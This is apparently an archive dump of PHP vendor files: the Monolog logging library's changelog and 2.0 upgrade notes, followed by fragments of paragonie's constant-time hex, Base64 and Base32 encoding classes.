vars) * Fixed Wildfire/FirePHP/ChromePHP handling of unicode characters * Fixed PHP 8 issues in SyslogUdpHandler * Fixed internal type error when mbstring is missing ### 2.1.1 (2020-07-23) * Fixed removing of json encoding options * Fixed type hint of $level not accepting strings in SendGridHandler and OverflowHandler * Fixed SwiftMailerHandler not accepting email templates with an empty subject * Fixed array access on null in RavenHandler * Fixed unique_id in WebProcessor not being disableable ### 2.1.0 (2020-05-22) * Added `JSON_INVALID_UTF8_SUBSTITUTE` to default json flags, so that invalid UTF8 characters now get converted to [�](https://en.wikipedia.org/wiki/Specials_(Unicode_block)#Replacement_character) instead of being converted from ISO-8859-15 to UTF8 as it was before, which was hardly a comprehensive solution * Added `$ignoreEmptyContextAndExtra` option to JsonFormatter to skip empty context/extra entirely from the output * Added `$parseMode`, `$disableWebPagePreview` and `$disableNotification` options to TelegramBotHandler * Added tentative support for PHP 8 * NormalizerFormatter::addJsonEncodeOption and removeJsonEncodeOption are now public to allow modifying default json flags * Fixed GitProcessor type error when there is no git repo present * Fixed normalization of SoapFault objects containing deeply nested objects as "detail" * Fixed support for relative paths in RotatingFileHandler ### 2.0.2 (2019-12-20) * Fixed ElasticsearchHandler swallowing exceptions details when failing to index log records * Fixed normalization of SoapFault objects containing non-strings as "detail" in LineFormatter * Fixed formatting of resources in JsonFormatter * Fixed RedisHandler failing to use MULTI properly when passed a proxied Redis instance (e.g. in Symfony with lazy services) * Fixed FilterHandler triggering a notice when handleBatch was filtering all records passed to it * Fixed Turkish locale messing up the conversion of level names to their constant values ### 2.0.1 (2019-11-13) * Fixed normalization of Traversables to avoid traversing them as not all of them are rewindable * Fixed setFormatter/getFormatter to forward to the nested handler in FilterHandler, FingersCrossedHandler, BufferHandler, OverflowHandler and SamplingHandler * Fixed BrowserConsoleHandler formatting when using multiple styles * Fixed normalization of exception codes to be always integers even for PDOException which have them as numeric strings * Fixed normalization of SoapFault objects containing non-strings as "detail" * Fixed json encoding across all handlers to always attempt recovery of non-UTF-8 strings instead of failing the whole encoding * Fixed ChromePHPHandler to avoid sending more data than latest Chrome versions allow in headers (4KB down from 256KB). * Fixed type error in BrowserConsoleHandler when the context array of log records was not associative. ### 2.0.0 (2019-08-30) * BC Break: This is a major release, see [UPGRADE.md](UPGRADE.md) for details if you are coming from a 1.x release * BC Break: Logger methods log/debug/info/notice/warning/error/critical/alert/emergency now have explicit void return types * Added FallbackGroupHandler which works like the WhatFailureGroupHandler but stops dispatching log records as soon as one handler accepted it * Fixed support for UTF-8 when cutting strings to avoid cutting a multibyte-character in half * Fixed normalizers handling of exception backtraces to avoid serializing arguments in some cases * Fixed date timezone handling in SyslogUdpHandler ### 2.0.0-beta2 (2019-07-06) * BC Break: This is a major release, see [UPGRADE.md](UPGRADE.md) for details if you are coming from a 1.x release * BC Break: PHP 7.2 is now the minimum required PHP version. * BC Break: Removed SlackbotHandler, RavenHandler and HipChatHandler, see [UPGRADE.md](UPGRADE.md) for details * Added OverflowHandler which will only flush log records to its nested handler when reaching a certain amount of logs (i.e. only pass through when things go really bad) * Added TelegramBotHandler to log records to a [Telegram](https://core.telegram.org/bots/api) bot account * Added support for JsonSerializable when normalizing exceptions * Added support for RFC3164 (outdated BSD syslog protocol) to SyslogUdpHandler * Added SoapFault details to formatted exceptions * Fixed DeduplicationHandler silently failing to start when file could not be opened * Fixed issue in GroupHandler and WhatFailureGroupHandler where setting multiple processors would duplicate records * Fixed GelfFormatter losing some data when one attachment was too long * Fixed issue in SignalHandler restarting syscalls functionality * Improved performance of LogglyHandler when sending multiple logs in a single request ### 2.0.0-beta1 (2018-12-08) * BC Break: This is a major release, see [UPGRADE.md](UPGRADE.md) for details if you are coming from a 1.x release * BC Break: PHP 7.1 is now the minimum required PHP version. * BC Break: Quite a few interface changes, only relevant if you implemented your own handlers/processors/formatters * BC Break: Removed non-PSR-3 methods to add records, all the `add*` (e.g. `addWarning`) methods as well as `emerg`, `crit`, `err` and `warn` * BC Break: The record timezone is now set per Logger instance and not statically anymore * BC Break: There is no more default handler configured on empty Logger instances * BC Break: ElasticSearchHandler renamed to ElasticaHandler * BC Break: Various handler-specific breaks, see [UPGRADE.md](UPGRADE.md) for details * Added scalar type hints and return hints in all the places it was possible. Switched strict_types on for more reliability. * Added DateTimeImmutable support, all record datetime are now immutable, and will toString/json serialize with the correct date format, including microseconds (unless disabled) * Added timezone and microseconds to the default date format * Added SendGridHandler to use the SendGrid API to send emails * Added LogmaticHandler to use the Logmatic.io API to store log records * Added SqsHandler to send log records to an AWS SQS queue * Added ElasticsearchHandler to send records via the official ES library. Elastica users should now use ElasticaHandler instead of ElasticSearchHandler * Added NoopHandler which is similar to the NullHandle but does not prevent the bubbling of log records to handlers further down the configuration, useful for temporarily disabling a handler in configuration files * Added ProcessHandler to write log output to the STDIN of a given process * Added HostnameProcessor that adds the machine's hostname to log records * Added a `$dateFormat` option to the PsrLogMessageProcessor which lets you format DateTime instances nicely * Added support for the PHP 7.x `mongodb` extension in the MongoDBHandler * Fixed many minor issues in various handlers, and probably added a few regressions too ### 1.26.1 (2021-05-28) * Fixed PHP 8.1 deprecation warning ### 1.26.0 (2020-12-14) * Added $dateFormat and $removeUsedContextFields arguments to PsrLogMessageProcessor (backport from 2.x) ### 1.25.5 (2020-07-23) * Fixed array access on null in RavenHandler * Fixed unique_id in WebProcessor not being disableable ### 1.25.4 (2020-05-22) * Fixed GitProcessor type error when there is no git repo present * Fixed normalization of SoapFault objects containing deeply nested objects as "detail" * Fixed support for relative paths in RotatingFileHandler ### 1.25.3 (2019-12-20) * Fixed formatting of resources in JsonFormatter * Fixed RedisHandler failing to use MULTI properly when passed a proxied Redis instance (e.g. in Symfony with lazy services) * Fixed FilterHandler triggering a notice when handleBatch was filtering all records passed to it * Fixed Turkish locale messing up the conversion of level names to their constant values ### 1.25.2 (2019-11-13) * Fixed normalization of Traversables to avoid traversing them as not all of them are rewindable * Fixed setFormatter/getFormatter to forward to the nested handler in FilterHandler, FingersCrossedHandler, BufferHandler and SamplingHandler * Fixed BrowserConsoleHandler formatting when using multiple styles * Fixed normalization of exception codes to be always integers even for PDOException which have them as numeric strings * Fixed normalization of SoapFault objects containing non-strings as "detail" * Fixed json encoding across all handlers to always attempt recovery of non-UTF-8 strings instead of failing the whole encoding ### 1.25.1 (2019-09-06) * Fixed forward-compatible interfaces to be compatible with Monolog 1.x too. ### 1.25.0 (2019-09-06) * Deprecated SlackbotHandler, use SlackWebhookHandler or SlackHandler instead * Deprecated RavenHandler, use sentry/sentry 2.x and their Sentry\Monolog\Handler instead * Deprecated HipChatHandler, migrate to Slack and use SlackWebhookHandler or SlackHandler instead * Added forward-compatible interfaces and traits FormattableHandlerInterface, FormattableHandlerTrait, ProcessableHandlerInterface, ProcessableHandlerTrait. If you use modern PHP and want to make code compatible with Monolog 1 and 2 this can help. You will have to require at least Monolog 1.25 though. * Added support for RFC3164 (outdated BSD syslog protocol) to SyslogUdpHandler * Fixed issue in GroupHandler and WhatFailureGroupHandler where setting multiple processors would duplicate records * Fixed issue in SignalHandler restarting syscalls functionality * Fixed normalizers handling of exception backtraces to avoid serializing arguments in some cases * Fixed ZendMonitorHandler to work with the latest Zend Server versions * Fixed ChromePHPHandler to avoid sending more data than latest Chrome versions allow in headers (4KB down from 256KB). ### 1.24.0 (2018-11-05) * BC Notice: If you are extending any of the Monolog's Formatters' `normalize` method, make sure you add the new `$depth = 0` argument to your function signature to avoid strict PHP warnings. * Added a `ResettableInterface` in order to reset/reset/clear/flush handlers and processors * Added a `ProcessorInterface` as an optional way to label a class as being a processor (mostly useful for autowiring dependency containers) * Added a way to log signals being received using Monolog\SignalHandler * Added ability to customize error handling at the Logger level using Logger::setExceptionHandler * Added InsightOpsHandler to migrate users of the LogEntriesHandler * Added protection to NormalizerFormatter against circular and very deep structures, it now stops normalizing at a depth of 9 * Added capture of stack traces to ErrorHandler when logging PHP errors * Added RavenHandler support for a `contexts` context or extra key to forward that to Sentry's contexts * Added forwarding of context info to FluentdFormatter * Added SocketHandler::setChunkSize to override the default chunk size in case you must send large log lines to rsyslog for example * Added ability to extend/override BrowserConsoleHandler * Added SlackWebhookHandler::getWebhookUrl and SlackHandler::getToken to enable class extensibility * Added SwiftMailerHandler::getSubjectFormatter to enable class extensibility * Dropped official support for HHVM in test builds * Fixed normalization of exception traces when call_user_func is used to avoid serializing objects and the data they contain * Fixed naming of fields in Slack handler, all field names are now capitalized in all cases * Fixed HipChatHandler bug where slack dropped messages randomly * Fixed normalization of objects in Slack handlers * Fixed support for PHP7's Throwable in NewRelicHandler * Fixed race bug when StreamHandler sometimes incorrectly reported it failed to create a directory * Fixed table row styling issues in HtmlFormatter * Fixed RavenHandler dropping the message when logging exception * Fixed WhatFailureGroupHandler skipping processors when using handleBatch and implement it where possible * Fixed display of anonymous class names ### 1.23.0 (2017-06-19) * Improved SyslogUdpHandler's support for RFC5424 and added optional `$ident` argument * Fixed GelfHandler truncation to be per field and not per message * Fixed compatibility issue with PHP <5.3.6 * Fixed support for headless Chrome in ChromePHPHandler * Fixed support for latest Aws SDK in DynamoDbHandler * Fixed support for SwiftMailer 6.0+ in SwiftMailerHandler ### 1.22.1 (2017-03-13) * Fixed lots of minor issues in the new Slack integrations * Fixed support for allowInlineLineBreaks in LineFormatter when formatting exception backtraces ### 1.22.0 (2016-11-26) * Added SlackbotHandler and SlackWebhookHandler to set up Slack integration more easily * Added MercurialProcessor to add mercurial revision and branch names to log records * Added support for AWS SDK v3 in DynamoDbHandler * Fixed fatal errors occurring when normalizing generators that have been fully consumed * Fixed RollbarHandler to include a level (rollbar level), monolog_level (original name), channel and datetime (unix) * Fixed RollbarHandler not flushing records automatically, calling close() explicitly is not necessary anymore * Fixed SyslogUdpHandler to avoid sending empty frames * Fixed a few PHP 7.0 and 7.1 compatibility issues ### 1.21.0 (2016-07-29) * Break: Reverted the addition of $context when the ErrorHandler handles regular php errors from 1.20.0 as it was causing issues * Added support for more formats in RotatingFileHandler::setFilenameFormat as long as they have Y, m and d in order * Added ability to format the main line of text the SlackHandler sends by explicitly setting a formatter on the handler * Added information about SoapFault instances in NormalizerFormatter * Added $handleOnlyReportedErrors option on ErrorHandler::registerErrorHandler (default true) to allow logging of all errors no matter the error_reporting level ### 1.20.0 (2016-07-02) * Added FingersCrossedHandler::activate() to manually trigger the handler regardless of the activation policy * Added StreamHandler::getUrl to retrieve the stream's URL * Added ability to override addRow/addTitle in HtmlFormatter * Added the $context to context information when the ErrorHandler handles a regular php error * Deprecated RotatingFileHandler::setFilenameFormat to only support 3 formats: Y, Y-m and Y-m-d * Fixed WhatFailureGroupHandler to work with PHP7 throwables * Fixed a few minor bugs ### 1.19.0 (2016-04-12) * Break: StreamHandler will not close streams automatically that it does not own. If you pass in a stream (not a path/url), then it will not close it for you. You can retrieve those using getStream() if needed * Added DeduplicationHandler to remove duplicate records from notifications across multiple requests, useful for email or other notifications on errors * Added ability to use `%message%` and other LineFormatter replacements in the subject line of emails sent with NativeMailHandler and SwiftMailerHandler * Fixed HipChatHandler handling of long messages ### 1.18.2 (2016-04-02) * Fixed ElasticaFormatter to use more precise dates * Fixed GelfMessageFormatter sending too long messages ### 1.18.1 (2016-03-13) * Fixed SlackHandler bug where slack dropped messages randomly * Fixed RedisHandler issue when using with the PHPRedis extension * Fixed AmqpHandler content-type being incorrectly set when using with the AMQP extension * Fixed BrowserConsoleHandler regression ### 1.18.0 (2016-03-01) * Added optional reduction of timestamp precision via `Logger->useMicrosecondTimestamps(false)`, disabling it gets you a bit of performance boost but reduces the precision to the second instead of microsecond * Added possibility to skip some extra stack frames in IntrospectionProcessor if you have some library wrapping Monolog that is always adding frames * Added `Logger->withName` to clone a logger (keeping all handlers) with a new name * Added FluentdFormatter for the Fluentd unix socket protocol * Added HandlerWrapper base class to ease the creation of handler wrappers, just extend it and override as needed * Added support for replacing context sub-keys using `%context.*%` in LineFormatter * Added support for `payload` context value in RollbarHandler * Added setRelease to RavenHandler to describe the application version, sent with every log * Added support for `fingerprint` context value in RavenHandler * Fixed JSON encoding errors that would gobble up the whole log record, we now handle those more gracefully by dropping chars as needed * Fixed write timeouts in SocketHandler and derivatives, set to 10sec by default, lower it with `setWritingTimeout()` * Fixed PHP7 compatibility with regard to Exception/Throwable handling in a few places ### 1.17.2 (2015-10-14) * Fixed ErrorHandler compatibility with non-Monolog PSR-3 loggers * Fixed SlackHandler handling to use slack functionalities better * Fixed SwiftMailerHandler bug when sending multiple emails they all had the same id * Fixed 5.3 compatibility regression ### 1.17.1 (2015-08-31) * Fixed RollbarHandler triggering PHP notices ### 1.17.0 (2015-08-30) * Added support for `checksum` and `release` context/extra values in RavenHandler * Added better support for exceptions in RollbarHandler * Added UidProcessor::getUid * Added support for showing the resource type in NormalizedFormatter * Fixed IntrospectionProcessor triggering PHP notices ### 1.16.0 (2015-08-09) * Added IFTTTHandler to notify ifttt.com triggers * Added Logger::setHandlers() to allow setting/replacing all handlers * Added $capSize in RedisHandler to cap the log size * Fixed StreamHandler creation of directory to only trigger when the first log write happens * Fixed bug in the handling of curl failures * Fixed duplicate logging of fatal errors when both error and fatal error handlers are registered in monolog's ErrorHandler * Fixed missing fatal errors records with handlers that need to be closed to flush log records * Fixed TagProcessor::addTags support for associative arrays ### 1.15.0 (2015-07-12) * Added addTags and setTags methods to change a TagProcessor * Added automatic creation of directories if they are missing for a StreamHandler to open a log file * Added retry functionality to Loggly, Cube and Mandrill handlers so they retry up to 5 times in case of network failure * Fixed process exit code being incorrectly reset to 0 if ErrorHandler::registerExceptionHandler was used * Fixed HTML/JS escaping in BrowserConsoleHandler * Fixed JSON encoding errors being silently suppressed (PHP 5.5+ only) ### 1.14.0 (2015-06-19) * Added PHPConsoleHandler to send record to Chrome's PHP Console extension and library * Added support for objects implementing __toString in the NormalizerFormatter * Added support for HipChat's v2 API in HipChatHandler * Added Logger::setTimezone() to initialize the timezone monolog should use in case date.timezone isn't correct for your app * Added an option to send formatted message instead of the raw record on PushoverHandler via ->useFormattedMessage(true) * Fixed curl errors being silently suppressed ### 1.13.1 (2015-03-09) * Fixed regression in HipChat requiring a new token to be created ### 1.13.0 (2015-03-05) * Added Registry::hasLogger to check for the presence of a logger instance * Added context.user support to RavenHandler * Added HipChat API v2 support in the HipChatHandler * Added NativeMailerHandler::addParameter to pass params to the mail() process * Added context data to SlackHandler when $includeContextAndExtra is true * Added ability to customize the Swift_Message per-email in SwiftMailerHandler * Fixed SwiftMailerHandler to lazily create message instances if a callback is provided * Fixed serialization of INF and NaN values in Normalizer and LineFormatter ### 1.12.0 (2014-12-29) * Break: HandlerInterface::isHandling now receives a partial record containing only a level key. This was always the intent and does not break any Monolog handler but is strictly speaking a BC break and you should check if you relied on any other field in your own handlers. * Added PsrHandler to forward records to another PSR-3 logger * Added SamplingHandler to wrap around a handler and include only every Nth record * Added MongoDBFormatter to support better storage with MongoDBHandler (it must be enabled manually for now) * Added exception codes in the output of most formatters * Added LineFormatter::includeStacktraces to enable exception stack traces in logs (uses more than one line) * Added $useShortAttachment to SlackHandler to minify attachment size and $includeExtra to append extra data * Added $host to HipChatHandler for users of private instances * Added $transactionName to NewRelicHandler and support for a transaction_name context value * Fixed MandrillHandler to avoid outputting API call responses * Fixed some non-standard behaviors in SyslogUdpHandler ### 1.11.0 (2014-09-30) * Break: The NewRelicHandler extra and context data are now prefixed with extra_ and context_ to avoid clashes. Watch out if you have scripts reading those from the API and rely on names * Added WhatFailureGroupHandler to suppress any exception coming from the wrapped handlers and avoid chain failures if a logging service fails * Added MandrillHandler to send emails via the Mandrillapp.com API * Added SlackHandler to log records to a Slack.com account * Added FleepHookHandler to log records to a Fleep.io account * Added LogglyHandler::addTag to allow adding tags to an existing handler * Added $ignoreEmptyContextAndExtra to LineFormatter to avoid empty [] at the end * Added $useLocking to StreamHandler and RotatingFileHandler to enable flock() while writing * Added support for PhpAmqpLib in the AmqpHandler * Added FingersCrossedHandler::clear and BufferHandler::clear to reset them between batches in long running jobs * Added support for adding extra fields from $_SERVER in the WebProcessor * Fixed support for non-string values in PrsLogMessageProcessor * Fixed SwiftMailer messages being sent with the wrong date in long running scripts * Fixed minor PHP 5.6 compatibility issues * Fixed BufferHandler::close being called twice ### 1.10.0 (2014-06-04) * Added Logger::getHandlers() and Logger::getProcessors() methods * Added $passthruLevel argument to FingersCrossedHandler to let it always pass some records through even if the trigger level is not reached * Added support for extra data in NewRelicHandler * Added $expandNewlines flag to the ErrorLogHandler to create multiple log entries when a message has multiple lines ### 1.9.1 (2014-04-24) * Fixed regression in RotatingFileHandler file permissions * Fixed initialization of the BufferHandler to make sure it gets flushed after receiving records * Fixed ChromePHPHandler and FirePHPHandler's activation strategies to be more conservative ### 1.9.0 (2014-04-20) * Added LogEntriesHandler to send logs to a LogEntries account * Added $filePermissions to tweak file mode on StreamHandler and RotatingFileHandler * Added $useFormatting flag to MemoryProcessor to make it send raw data in bytes * Added support for table formatting in FirePHPHandler via the table context key * Added a TagProcessor to add tags to records, and support for tags in RavenHandler * Added $appendNewline flag to the JsonFormatter to enable using it when logging to files * Added sound support to the PushoverHandler * Fixed multi-threading support in StreamHandler * Fixed empty headers issue when ChromePHPHandler received no records * Fixed default format of the ErrorLogHandler ### 1.8.0 (2014-03-23) * Break: the LineFormatter now strips newlines by default because this was a bug, set $allowInlineLineBreaks to true if you need them * Added BrowserConsoleHandler to send logs to any browser's console via console.log() injection in the output * Added FilterHandler to filter records and only allow those of a given list of levels through to the wrapped handler * Added FlowdockHandler to send logs to a Flowdock account * Added RollbarHandler to send logs to a Rollbar account * Added HtmlFormatter to send prettier log emails with colors for each log level * Added GitProcessor to add the current branch/commit to extra record data * Added a Monolog\Registry class to allow easier global access to pre-configured loggers * Added support for the new official graylog2/gelf-php lib for GelfHandler, upgrade if you can by replacing the mlehner/gelf-php requirement * Added support for HHVM * Added support for Loggly batch uploads * Added support for tweaking the content type and encoding in NativeMailerHandler * Added $skipClassesPartials to tweak the ignored classes in the IntrospectionProcessor * Fixed batch request support in GelfHandler ### 1.7.0 (2013-11-14) * Added ElasticSearchHandler to send logs to an Elastic Search server * Added DynamoDbHandler and ScalarFormatter to send logs to Amazon's Dynamo DB * Added SyslogUdpHandler to send logs to a remote syslogd server * Added LogglyHandler to send logs to a Loggly account * Added $level to IntrospectionProcessor so it only adds backtraces when needed * Added $version to LogstashFormatter to allow using the new v1 Logstash format * Added $appName to NewRelicHandler * Added configuration of Pushover notification retries/expiry * Added $maxColumnWidth to NativeMailerHandler to change the 70 chars default * Added chainability to most setters for all handlers * Fixed RavenHandler batch processing so it takes the message from the record with highest priority * Fixed HipChatHandler batch processing so it sends all messages at once * Fixed issues with eAccelerator * Fixed and improved many small things ### 1.6.0 (2013-07-29) * Added HipChatHandler to send logs to a HipChat chat room * Added ErrorLogHandler to send logs to PHP's error_log function * Added NewRelicHandler to send logs to NewRelic's service * Added Monolog\ErrorHandler helper class to register a Logger as exception/error/fatal handler * Added ChannelLevelActivationStrategy for the FingersCrossedHandler to customize levels by channel * Added stack traces output when normalizing exceptions (json output & co) * Added Monolog\Logger::API constant (currently 1) * Added support for ChromePHP's v4.0 extension * Added support for message priorities in PushoverHandler, see $highPriorityLevel and $emergencyLevel * Added support for sending messages to multiple users at once with the PushoverHandler * Fixed RavenHandler's support for batch sending of messages (when behind a Buffer or FingersCrossedHandler) * Fixed normalization of Traversables with very large data sets, only the first 1000 items are shown now * Fixed issue in RotatingFileHandler when an open_basedir restriction is active * Fixed minor issues in RavenHandler and bumped the API to Raven 0.5.0 * Fixed SyslogHandler issue when many were used concurrently with different facilities ### 1.5.0 (2013-04-23) * Added ProcessIdProcessor to inject the PID in log records * Added UidProcessor to inject a unique identifier to all log records of one request/run * Added support for previous exceptions in the LineFormatter exception serialization * Added Monolog\Logger::getLevels() to get all available levels * Fixed ChromePHPHandler so it avoids sending headers larger than Chrome can handle ### 1.4.1 (2013-04-01) * Fixed exception formatting in the LineFormatter to be more minimalistic * Fixed RavenHandler's handling of context/extra data, requires Raven client >0.1.0 * Fixed log rotation in RotatingFileHandler to work with long running scripts spanning multiple days * Fixed WebProcessor array access so it checks for data presence * Fixed Buffer, Group and FingersCrossed handlers to make use of their processors ### 1.4.0 (2013-02-13) * Added RedisHandler to log to Redis via the Predis library or the phpredis extension * Added ZendMonitorHandler to log to the Zend Server monitor * Added the possibility to pass arrays of handlers and processors directly in the Logger constructor * Added `$useSSL` option to the PushoverHandler which is enabled by default * Fixed ChromePHPHandler and FirePHPHandler issue when multiple instances are used simultaneously * Fixed header injection capability in the NativeMailHandler ### 1.3.1 (2013-01-11) * Fixed LogstashFormatter to be usable with stream handlers * Fixed GelfMessageFormatter levels on Windows ### 1.3.0 (2013-01-08) * Added PSR-3 compliance, the `Monolog\Logger` class is now an instance of `Psr\Log\LoggerInterface` * Added PsrLogMessageProcessor that you can selectively enable for full PSR-3 compliance * Added LogstashFormatter (combine with SocketHandler or StreamHandler to send logs to Logstash) * Added PushoverHandler to send mobile notifications * Added CouchDBHandler and DoctrineCouchDBHandler * Added RavenHandler to send data to Sentry servers * Added support for the new MongoClient class in MongoDBHandler * Added microsecond precision to log records' timestamps * Added `$flushOnOverflow` param to BufferHandler to flush by batches instead of losing the oldest entries * Fixed normalization of objects with cyclic references ### 1.2.1 (2012-08-29) * Added new $logopts arg to SyslogHandler to provide custom openlog options * Fixed fatal error in SyslogHandler ### 1.2.0 (2012-08-18) * Added AmqpHandler (for use with AMQP servers) * Added CubeHandler * Added NativeMailerHandler::addHeader() to send custom headers in mails * Added the possibility to specify more than one recipient in NativeMailerHandler * Added the possibility to specify float timeouts in SocketHandler * Added NOTICE and EMERGENCY levels to conform with RFC 5424 * Fixed the log records to use the php default timezone instead of UTC * Fixed BufferHandler not being flushed properly on PHP fatal errors * Fixed normalization of exotic resource types * Fixed the default format of the SyslogHandler to avoid duplicating datetimes in syslog ### 1.1.0 (2012-04-23) * Added Monolog\Logger::isHandling() to check if a handler will handle the given log level * Added ChromePHPHandler * Added MongoDBHandler * Added GelfHandler (for use with Graylog2 servers) * Added SocketHandler (for use with syslog-ng for example) * Added NormalizerFormatter * Added the possibility to change the activation strategy of the FingersCrossedHandler * Added possibility to show microseconds in logs * Added `server` and `referer` to WebProcessor output ### 1.0.2 (2011-10-24) * Fixed bug in IE with large response headers and FirePHPHandler ### 1.0.1 (2011-08-25) * Added MemoryPeakUsageProcessor and MemoryUsageProcessor * Added Monolog\Logger::getName() to get a logger's channel name ### 1.0.0 (2011-07-06) * Added IntrospectionProcessor to get info from where the logger was called * Fixed WebProcessor in CLI ### 1.0.0-RC1 (2011-07-01) * Initial release google-api/vendor/monolog/monolog/UPGRADE.md000064400000005537147600400120014625 0ustar00### 2.0.0 - `Monolog\Logger::API` can be used to distinguish between a Monolog `1` and `2` install of Monolog when writing integration code. - Removed non-PSR-3 methods to add records, all the `add*` (e.g. `addWarning`) methods as well as `emerg`, `crit`, `err` and `warn`. - DateTime are now formatted with a timezone and microseconds (unless disabled). Various formatters and log output might be affected, which may mess with log parsing in some cases. - The `datetime` in every record array is now a DateTimeImmutable, not that you should have been modifying these anyway. - The timezone is now set per Logger instance and not statically, either via ->setTimezone or passed in the constructor. Calls to Logger::setTimezone should be converted. - `HandlerInterface` has been split off and two new interfaces now exist for more granular controls: `ProcessableHandlerInterface` and `FormattableHandlerInterface`. Handlers not extending `AbstractHandler` should make sure to implement the relevant interfaces. - `HandlerInterface` now requires the `close` method to be implemented. This only impacts you if you implement the interface yourself, but you can extend the new `Monolog\Handler\Handler` base class too. - There is no more default handler configured on empty Logger instances, if you were relying on that you will not get any output anymore, make sure to configure the handler you need. #### LogglyFormatter - The records' `datetime` is not sent anymore. Only `timestamp` is sent to Loggly. #### AmqpHandler - Log levels are not shortened to 4 characters anymore. e.g. a warning record will be sent using the `warning.channel` routing key instead of `warn.channel` as in 1.x. - The exchange name does not default to 'log' anymore, and it is completely ignored now for the AMQP extension users. Only PHPAmqpLib uses it if provided. #### RotatingFileHandler - The file name format must now contain `{date}` and the date format must be set to one of the predefined FILE_PER_* constants to avoid issues with file rotation. See `setFilenameFormat`. #### LogstashFormatter - Removed Logstash V0 support - Context/extra prefix has been removed in favor of letting users configure the exact key being sent - Context/extra data are now sent as an object instead of single keys #### HipChatHandler - Removed deprecated HipChat handler, migrate to Slack and use SlackWebhookHandler or SlackHandler instead #### SlackbotHandler - Removed deprecated SlackbotHandler handler, use SlackWebhookHandler or SlackHandler instead #### RavenHandler - Removed deprecated RavenHandler handler, use sentry/sentry 2.x and their Sentry\Monolog\Handler instead #### ElasticSearchHandler - As support for the official Elasticsearch library was added, the former ElasticSearchHandler has been renamed to ElasticaHandler and the new one added as ElasticsearchHandler. google-api/vendor/paragonie/constant_time_encoding/src/EncoderInterface.php000064400000003700147600400120023240 0ustar00 $chunk */ $chunk = \unpack('C', $binString[$i]); $c = $chunk[1] & 0xf; $b = $chunk[1] >> 4; $hex .= \pack( 'CC', (87 + $b + ((($b - 10) >> 8) & ~38)), (87 + $c + ((($c - 10) >> 8) & ~38)) ); } return $hex; } /** * Convert a binary string into a hexadecimal string without cache-timing * leaks, returning uppercase letters (as per RFC 4648) * * @param string $binString (raw binary) * @return string * @throws TypeError */ public static function encodeUpper(string $binString): string { $hex = ''; $len = Binary::safeStrlen($binString); for ($i = 0; $i < $len; ++$i) { /** @var array $chunk */ $chunk = \unpack('C', $binString[$i]); $c = $chunk[1] & 0xf; $b = $chunk[1] >> 4; $hex .= \pack( 'CC', (55 + $b + ((($b - 10) >> 8) & ~6)), (55 + $c + ((($c - 10) >> 8) & ~6)) ); } return $hex; } /** * Convert a hexadecimal string into a binary string without cache-timing * leaks * * @param string $encodedString * @param bool $strictPadding * @return string (raw binary) * @throws RangeException */ public static function decode( string $encodedString, bool $strictPadding = false ): string { $hex_pos = 0; $bin = ''; $c_acc = 0; $hex_len = Binary::safeStrlen($encodedString); $state = 0; if (($hex_len & 1) !== 0) { if ($strictPadding) { throw new RangeException( 'Expected an even number of hexadecimal characters' ); } else { $encodedString = '0' . $encodedString; ++$hex_len; } } /** @var array $chunk */ $chunk = \unpack('C*', $encodedString); while ($hex_pos < $hex_len) { ++$hex_pos; $c = $chunk[$hex_pos]; $c_num = $c ^ 48; $c_num0 = ($c_num - 10) >> 8; $c_alpha = ($c & ~32) - 55; $c_alpha0 = (($c_alpha - 10) ^ ($c_alpha - 16)) >> 8; if (($c_num0 | $c_alpha0) === 0) { throw new RangeException( 'Expected hexadecimal character' ); } $c_val = ($c_num0 & $c_num) | ($c_alpha & $c_alpha0); if ($state === 0) { $c_acc = $c_val * 16; } else { $bin .= \pack('C', $c_acc | $c_val); } $state ^= 1; } return $bin; } } google-api/vendor/paragonie/constant_time_encoding/src/Base64DotSlash.php000064400000005737147600400120022542 0ustar00 0x2d && $src < 0x30) ret += $src - 0x2e + 1; // -45 $ret += (((0x2d - $src) & ($src - 0x30)) >> 8) & ($src - 45); // if ($src > 0x40 && $src < 0x5b) ret += $src - 0x41 + 2 + 1; // -62 $ret += (((0x40 - $src) & ($src - 0x5b)) >> 8) & ($src - 62); // if ($src > 0x60 && $src < 0x7b) ret += $src - 0x61 + 28 + 1; // -68 $ret += (((0x60 - $src) & ($src - 0x7b)) >> 8) & ($src - 68); // if ($src > 0x2f && $src < 0x3a) ret += $src - 0x30 + 54 + 1; // 7 $ret += (((0x2f - $src) & ($src - 0x3a)) >> 8) & ($src + 7); return $ret; } /** * Uses bitwise operators instead of table-lookups to turn 8-bit integers * into 6-bit integers. * * @param int $src * @return string */ protected static function encode6Bits(int $src): string { $src += 0x2e; // if ($src > 0x2f) $src += 0x41 - 0x30; // 17 $src += ((0x2f - $src) >> 8) & 17; // if ($src > 0x5a) $src += 0x61 - 0x5b; // 6 $src += ((0x5a - $src) >> 8) & 6; // if ($src > 0x7a) $src += 0x30 - 0x7b; // -75 $src -= ((0x7a - $src) >> 8) & 75; return \pack('C', $src); } } google-api/vendor/paragonie/constant_time_encoding/src/Base64UrlSafe.php000064400000006234147600400120022353 0ustar00 0x40 && $src < 0x5b) $ret += $src - 0x41 + 1; // -64 $ret += (((0x40 - $src) & ($src - 0x5b)) >> 8) & ($src - 64); // if ($src > 0x60 && $src < 0x7b) $ret += $src - 0x61 + 26 + 1; // -70 $ret += (((0x60 - $src) & ($src - 0x7b)) >> 8) & ($src - 70); // if ($src > 0x2f && $src < 0x3a) $ret += $src - 0x30 + 52 + 1; // 5 $ret += (((0x2f - $src) & ($src - 0x3a)) >> 8) & ($src + 5); // if ($src == 0x2c) $ret += 62 + 1; $ret += (((0x2c - $src) & ($src - 0x2e)) >> 8) & 63; // if ($src == 0x5f) ret += 63 + 1; $ret += (((0x5e - $src) & ($src - 0x60)) >> 8) & 64; return $ret; } /** * Uses bitwise operators instead of table-lookups to turn 8-bit integers * into 6-bit integers. * * @param int $src * @return string */ protected static function encode6Bits(int $src): string { $diff = 0x41; // if ($src > 25) $diff += 0x61 - 0x41 - 26; // 6 $diff += ((25 - $src) >> 8) & 6; // if ($src > 51) $diff += 0x30 - 0x61 - 26; // -75 $diff -= ((51 - $src) >> 8) & 75; // if ($src > 61) $diff += 0x2d - 0x30 - 10; // -13 $diff -= ((61 - $src) >> 8) & 13; // if ($src > 62) $diff += 0x5f - 0x2b - 1; // 3 $diff += ((62 - $src) >> 8) & 49; return \pack('C', $src + $diff); } } google-api/vendor/paragonie/constant_time_encoding/src/Base32Hex.php000064400000006531147600400120021531 0ustar00 0x30 && $src < 0x3a) ret += $src - 0x2e + 1; // -47 $ret += (((0x2f - $src) & ($src - 0x3a)) >> 8) & ($src - 47); // if ($src > 0x60 && $src < 0x77) ret += $src - 0x61 + 10 + 1; // 